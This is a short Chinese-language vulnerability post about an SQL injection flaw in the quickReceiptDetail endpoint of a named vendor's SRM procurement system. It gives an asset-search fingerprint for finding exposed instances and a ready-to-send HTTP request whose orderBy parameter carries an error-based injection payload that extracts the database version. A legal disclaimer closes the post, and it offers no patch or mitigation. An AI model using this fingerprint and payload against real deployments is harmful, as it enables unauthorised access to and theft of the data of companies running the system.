漏洞描述

智互联(深圳)科技有限公司SRM智联云采系统针对企业供应链管理难题，及智能化转型升级需求，智联云采依托人工智能、物联网、大数据、云等技术，通过软硬件系统化方案，帮助企业实现供应商关系管理和采购线上化、移动化、智能化，提升采购和协同效率，进而规避供需风险，强化供应链整合能力，构建企业利益共同体。智互联SRM智联云采系统quickReceiptDetail存在SQL注入漏洞，攻击者可利用该漏洞获取敏感信息。

资产概要

title=="SRM 2.0"

 漏洞复现 

GET /adpweb/api/srm/delivery/quickReceiptDetail?orderBy=1%20AND%20GTID_SUBSET(CONCAT(0x7162786b71,(SELECT%20VERSION()),0x7176787671),3060) HTTP/1.1
Host: *****

免责声明

文章及相关内容仅限于合法合规的安全研究与技术学习用途。任何用户因将工具或相关信息用于其他用途而引发的法律后果或连带责任，均由使用者自行承担，作者及发布者对此不承担任何形式的法律责任或连带责任。本文仅分享来源于公开渠道的漏洞 POC，旨在促进学术研究与技术交流，不对因信息使用而导致的任何直接或间接后果、损失或风险承担责任。如本内容存在侵犯他人合法权益的情形，请立即与作者联系，作者将尽快采取必要措施予以删除并致以歉意。